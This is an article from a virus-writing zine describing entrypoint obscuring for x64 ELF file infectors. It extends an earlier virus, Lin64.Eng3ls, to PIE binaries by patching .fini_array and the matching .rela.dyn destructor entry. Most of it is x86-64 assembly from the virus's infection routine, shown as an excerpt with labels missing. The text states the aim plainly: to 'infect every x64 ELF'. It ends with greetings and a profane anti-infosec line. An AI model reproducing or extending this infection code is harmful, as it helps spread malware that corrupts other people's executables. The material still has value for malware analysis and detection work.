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|::::::::::| A short note on entrypoint obscuring in ELF binaries |::::::::::|

With love, by s01den.

In the previous zine, Sblip and I presented you a virus we wrote, Lin64.Eng3ls,
infecting x64 ELF. This virus implemented some fancy anti-RE techniques such as
simple encryption, entrypoint obscuring (EPO) and .init_array hijacking to 
detect debuggers by pointing to a ptrace call.

======================== Quick reminder from tmp.0ut #1 ========================
In non-EPO viruses, the entrypoint of an infected program is modified to point 
to the beginning of the virus, whereas in EPO viruses, the virus is called in 
another way, whether by hiding a jump in the host's code or by, like here, 
abusing a specificity of the executable file format.

In Eng3ls, the EPO was made by modifying the .fini_array section (which contains
a pointer to the destructor) in order to make it point to the virus's first 
instruction. However, at the time, we thought that this technique was only 
working for non-PIE binaries, so Eng3ls couldn't infect a lot of files. We 
simply didn't manage to make this technique working for PIE binaries.

But some months after the releasing of Tmp.0ut #1, I started up the debugger to 
solve this issue once and for all. The problem was that there is another place 
where the pointer to the destructor is stored: an entry in the .rela.dyn 
section. We just have to patch it with the address of the virus's first 

--------------------------- CUT-HERE -----------------------------
  xor rcx, rcx
  xor rdx, rdx
  mov cx, word [rax+e_hdr.shnum]     ;  rcx contains the number of entries in the program header table
  mov rbx, qword [rax+e_hdr.shoff]   ;  rbx contains the offset of the program header table
  mov dx, word [rax+e_hdr.shentsize] ;  rdx contains the size of an entry in the program header table

  add rbx, rdx
  dec rcx
  cmp dword [rax+rbx+e_shdr.type], 0x0F ; 0x0F = SHT_FINI_ARRAY, the section we're looking to modify to EPO (.fini_array)
  je dtor_found
  cmp rcx, 0
  jg loop_shdr

  mov rdi, qword [rax+rbx+e_shdr.offset]
  mov r12, qword [rax+rdi]

  xor rcx, rcx
  xor rdx, rdx
  mov cx, word [rax+e_hdr.shnum]     ; rcx contains the number of entries in the program header table
  mov rbx, qword [rax+e_hdr.shoff]   ; rbx contains the offset of the program header table
  mov dx, word [rax+e_hdr.shentsize] ; rdx contains the size of an entry in the program header table
    add rbx, rdx
    dec rcx
    cmp dword [rax+rbx+e_shdr.type], 0x04 ; 0x04 = SHT_RELA, we need to modify an entry of this section in order to make the EPO working
    je rela_dyn_found
    cmp rcx, 0
    jg loop_shdr_2

  ; compute the address differently if the ELF is PIE or not
    pop rdi
    cmp word [rax+e_hdr.type], 2
    je check_non_pie
    cmp qword [rax+rdi], 0x00006000
    jng continue_infect
    mov rdi, r8
    mov rax, 3            ; close
    mov rsp, rbp

    cmp qword [rax+rdi], 0x0c000000
    jng continue_infect
    mov rdi, r8
    mov rax, 3            ; close
    mov rsp, rbp

  ; called when we found the .rela.dyn section
    push rdi
    mov rdi, qword [rax+rbx+e_shdr.offset]
    xor rcx, rcx
      lea rbx, [rdi+rcx*8]
      mov r10, qword [rax+rbx] ; r10 contains an addr we obtain by parsing the section
      cmp r10, r12 ; r12 contains the addr stored in .fini_array (before our modifications)
      jne .continue ; loop until we find the right addr to modify
      mov qword [rax+rbx], r9 ; when we find it, we replace it with the virus's EP
      mov rcx,0xf
      inc rcx
      cmp rcx, 0x10
      jne .loop
    jmp check_pie

  mov [rax+rdi], r9 ; we write the virus's EP in .fini_array
  ;           ...
  ; apply the modifications

Now we can infect every x64 ELF, PIE or not, with EPO!
Every? Not exactly... We'll see that in the next issue!

Have a good day!

------> Greetz to:
Sblip, TMZ, netsp00ky, smelly, the tmp.0ut crew, Sh4ll, 0kb, Xylit0l and all the
others persons who keep the underground mind!
Fuck infosec and all the capitalists pigs.